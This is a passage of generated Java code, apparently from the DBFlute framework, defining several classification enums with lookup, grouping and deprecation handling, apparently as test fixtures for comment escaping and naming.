return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static EscapedJavaDocCls codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof EscapedJavaDocCls) { return (EscapedJavaDocCls)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static EscapedJavaDocCls nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<EscapedJavaDocCls> listAll() {
return new ArrayList<EscapedJavaDocCls>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<EscapedJavaDocCls> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
if ("lineGroup".equalsIgnoreCase(groupName)) { return listOfLineGroup(); }
throw new ClassificationNotFoundException("Unknown classification group: EscapedJavaDocCls." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<EscapedJavaDocCls> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<EscapedJavaDocCls> clsList = new ArrayList<EscapedJavaDocCls>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* /*IF pmb.yourGroup*/><& <br>
* The group elements:[First, Second]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<EscapedJavaDocCls> listOfLineGroup() {
return new ArrayList<EscapedJavaDocCls>(Arrays.asList(First, Second));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<EscapedJavaDocCls> groupOf(String groupName) {
if ("lineGroup".equals(groupName)) { return listOfLineGroup(); }
return new ArrayList<EscapedJavaDocCls>(4);
}
@Override public String toString() { return code(); }
}
/**
* 6
*/
public enum EscapedNumberInitialCls implements CDef {
/** 1Foo */
N1Foo("1FO", "1Foo", emptyStrings())
,
/** 3Bar */
N3Bar("3BA", "3Bar", emptyStrings())
,
/** 7Qux */
N7Qux("7QU", "7Qux", emptyStrings())
,
/** Corge9 */
Corge9("CO9", "Corge9", emptyStrings())
;
private static final Map<String, EscapedNumberInitialCls> _codeClsMap = new HashMap<String, EscapedNumberInitialCls>();
private static final Map<String, EscapedNumberInitialCls> _nameClsMap = new HashMap<String, EscapedNumberInitialCls>();
static {
for (EscapedNumberInitialCls value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private EscapedNumberInitialCls(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.EscapedNumberInitialCls; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<EscapedNumberInitialCls> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof EscapedNumberInitialCls) { return OptionalThing.of((EscapedNumberInitialCls)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<EscapedNumberInitialCls> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static EscapedNumberInitialCls codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof EscapedNumberInitialCls) { return (EscapedNumberInitialCls)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static EscapedNumberInitialCls nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<EscapedNumberInitialCls> listAll() {
return new ArrayList<EscapedNumberInitialCls>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<EscapedNumberInitialCls> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: EscapedNumberInitialCls." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<EscapedNumberInitialCls> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<EscapedNumberInitialCls> clsList = new ArrayList<EscapedNumberInitialCls>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<EscapedNumberInitialCls> groupOf(String groupName) {
return new ArrayList<EscapedNumberInitialCls>(4);
}
@Override public String toString() { return code(); }
}
/**
* top first line top second line top third line
*/
public enum LineSepCommentCls implements CDef {
/** First: foo first line foo second line */
First("FOO", "First", emptyStrings())
,
/** Second: bar first line bar second line */
Second("BAR", "Second", emptyStrings())
;
private static final Map<String, LineSepCommentCls> _codeClsMap = new HashMap<String, LineSepCommentCls>();
private static final Map<String, LineSepCommentCls> _nameClsMap = new HashMap<String, LineSepCommentCls>();
static {
for (LineSepCommentCls value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private LineSepCommentCls(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.LineSepCommentCls; }
/**
* Is the classification in the group? <br>
* group first line group second line <br>
* The group elements:[First, Second]
* @return The determination, true or false.
*/
public boolean isLineGroup() {
return First.equals(this) || Second.equals(this);
}
public boolean inGroup(String groupName) {
if ("lineGroup".equals(groupName)) { return isLineGroup(); }
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<LineSepCommentCls> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof LineSepCommentCls) { return OptionalThing.of((LineSepCommentCls)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<LineSepCommentCls> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static LineSepCommentCls codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof LineSepCommentCls) { return (LineSepCommentCls)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static LineSepCommentCls nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<LineSepCommentCls> listAll() {
return new ArrayList<LineSepCommentCls>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<LineSepCommentCls> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
if ("lineGroup".equalsIgnoreCase(groupName)) { return listOfLineGroup(); }
throw new ClassificationNotFoundException("Unknown classification group: LineSepCommentCls." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<LineSepCommentCls> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<LineSepCommentCls> clsList = new ArrayList<LineSepCommentCls>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* group first line group second line <br>
* The group elements:[First, Second]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<LineSepCommentCls> listOfLineGroup() {
return new ArrayList<LineSepCommentCls>(Arrays.asList(First, Second));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<LineSepCommentCls> groupOf(String groupName) {
if ("lineGroup".equals(groupName)) { return listOfLineGroup(); }
return new ArrayList<LineSepCommentCls>(4);
}
@Override public String toString() { return code(); }
}
/**
* no camelizing classification
*/
public enum NamingDefaultCamelizingType implements CDef {
/** Bonvo */
Bonvo("BONVO", "Bonvo", emptyStrings())
,
/** dstore */
Dstore("DSTORE", "dstore", emptyStrings())
,
/** LAND陸oneman */
LAND陸oneman("LAND", "LAND陸oneman", emptyStrings())
,
/** PI AR-I */
PiArI("PIARI", "PI AR-I", emptyStrings())
,
/** SEA海MYSTIC */
Sea海mystic("SEA", "SEA海MYSTIC", emptyStrings())
;
private static final Map<String, NamingDefaultCamelizingType> _codeClsMap = new HashMap<String, NamingDefaultCamelizingType>();
private static final Map<String, NamingDefaultCamelizingType> _nameClsMap = new HashMap<String, NamingDefaultCamelizingType>();
static {
for (NamingDefaultCamelizingType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private NamingDefaultCamelizingType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.NamingDefaultCamelizingType; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<NamingDefaultCamelizingType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof NamingDefaultCamelizingType) { return OptionalThing.of((NamingDefaultCamelizingType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<NamingDefaultCamelizingType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static NamingDefaultCamelizingType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof NamingDefaultCamelizingType) { return (NamingDefaultCamelizingType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static NamingDefaultCamelizingType nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<NamingDefaultCamelizingType> listAll() {
return new ArrayList<NamingDefaultCamelizingType>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<NamingDefaultCamelizingType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: NamingDefaultCamelizingType." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<NamingDefaultCamelizingType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<NamingDefaultCamelizingType> clsList = new ArrayList<NamingDefaultCamelizingType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<NamingDefaultCamelizingType> groupOf(String groupName) {
return new ArrayList<NamingDefaultCamelizingType>(4);
}
@Override public String toString() { return code(); }
}
/**
* no camelizing classification
*/
public enum NamingNoCamelizingType implements CDef {
/** Bonvo */
Bonvo("BONVO", "Bonvo", emptyStrings())
,
/** dstore */
dstore("DSTORE", "dstore", emptyStrings())
,
/** LAND陸oneman */
LAND陸oneman("LAND", "LAND陸oneman", emptyStrings())
,
/** PI AR-I */
PI_ARI("PIARI", "PI AR-I", emptyStrings())
,
/** SEA海MYSTIC */
SEA海MYSTIC("SEA", "SEA海MYSTIC", emptyStrings())
;
private static final Map<String, NamingNoCamelizingType> _codeClsMap = new HashMap<String, NamingNoCamelizingType>();
private static final Map<String, NamingNoCamelizingType> _nameClsMap = new HashMap<String, NamingNoCamelizingType>();
static {
for (NamingNoCamelizingType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private NamingNoCamelizingType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.NamingNoCamelizingType; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<NamingNoCamelizingType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof NamingNoCamelizingType) { return OptionalThing.of((NamingNoCamelizingType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<NamingNoCamelizingType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static NamingNoCamelizingType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof NamingNoCamelizingType) { return (NamingNoCamelizingType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static NamingNoCamelizingType nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<NamingNoCamelizingType> listAll() {
return new ArrayList<NamingNoCamelizingType>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<NamingNoCamelizingType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: NamingNoCamelizingType." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<NamingNoCamelizingType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<NamingNoCamelizingType> clsList = new ArrayList<NamingNoCamelizingType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<NamingNoCamelizingType> groupOf(String groupName) {
return new ArrayList<NamingNoCamelizingType>(4);
}
@Override public String toString() { return code(); }
}
/**
* is deprecated classification
*/
@Deprecated
public enum DeprecatedTopBasicType implements CDef {
/** FooName */
FooName("FOO", "FooName", emptyStrings())
,
/** BarName */
BarName("BAR", "BarName", emptyStrings())
,
/** QuxName */
QuxName("QUX", "QuxName", emptyStrings())
;
private static final Map<String, DeprecatedTopBasicType> _codeClsMap = new HashMap<String, DeprecatedTopBasicType>();
private static final Map<String, DeprecatedTopBasicType> _nameClsMap = new HashMap<String, DeprecatedTopBasicType>();
static {
for (DeprecatedTopBasicType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private DeprecatedTopBasicType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.DeprecatedTopBasicType; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<DeprecatedTopBasicType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof DeprecatedTopBasicType) { return OptionalThing.of((DeprecatedTopBasicType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<DeprecatedTopBasicType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static DeprecatedTopBasicType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof DeprecatedTopBasicType) { return (DeprecatedTopBasicType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static DeprecatedTopBasicType nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<DeprecatedTopBasicType> listAll() {
return new ArrayList<DeprecatedTopBasicType>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<DeprecatedTopBasicType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: DeprecatedTopBasicType." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<DeprecatedTopBasicType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<DeprecatedTopBasicType> clsList = new ArrayList<DeprecatedTopBasicType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<DeprecatedTopBasicType> groupOf(String groupName) {
return new ArrayList<DeprecatedTopBasicType>(4);
}
@Override public String toString() { return code(); }
}
/**
* has deprecated element
*/
public enum DeprecatedMapBasicType implements CDef {
/** FooName */
FooName("FOO", "FooName", emptyStrings())
,
/** BarName: (deprecated: test of deprecated) */
@Deprecated
BarName("BAR", "BarName", emptyStrings())
,
/** QuxName */
QuxName("QUX", "QuxName", emptyStrings())
;
private static final Map<String, DeprecatedMapBasicType> _codeClsMap = new HashMap<String, DeprecatedMapBasicType>();
private static final Map<String, DeprecatedMapBasicType> _nameClsMap = new HashMap<String, DeprecatedMapBasicType>();
static {
for (DeprecatedMapBasicType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private DeprecatedMapBasicType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.DeprecatedMapBasicType; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<DeprecatedMapBasicType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof DeprecatedMapBasicType) { return OptionalThing.of((DeprecatedMapBasicType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
